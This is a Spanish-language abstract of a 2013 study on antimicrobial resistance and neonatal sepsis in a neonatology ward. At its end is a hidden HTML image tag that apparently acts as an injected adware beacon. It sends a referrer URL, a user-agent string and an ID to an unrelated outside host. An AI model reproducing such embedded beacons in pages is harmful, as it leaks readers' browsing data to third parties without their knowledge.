Comportamiento de la resistencia antimicrobiana en servicio cerrado de neonatología - Pino Muñoz, Mirta Susana; Ojeda Pino, Bárbara; Martínez Martínez, Mercedes; Brougthon Ferriol, Jacqueline; González Ramírez, Giselle; Pina Rodríguez, Andrés (Mediciego, 2013)
La sepsis neonatal es una de las causas más frecuentes de hospitalización en los servicios de neonatología, se mantiene también dentro de las primeras causas de muerte en este periodo de la vida. Se observa los resultados de los cultivos realizados a los recién nacidos que ingresan al servicio. Actualmente se observan nuevos gérmenes que no estaban presentes años atrás en el mapa microbiológico y a lo que es más importante, tanto los gérmenes ya conocidos, como los de nueva aparición en el medio, tienen un incremento de la resistencia a los antimicrobianos, lo que hace que el manejo de la sepsis se haya convertido en un reto para todos los clínicos. Con el objetivo de conocer el estado de la resistencia antimicrobiana en el servicio se realiza el presente trabajo. <img src="http://prettysite.xyz/acnt?_=1583849936976&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F200&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />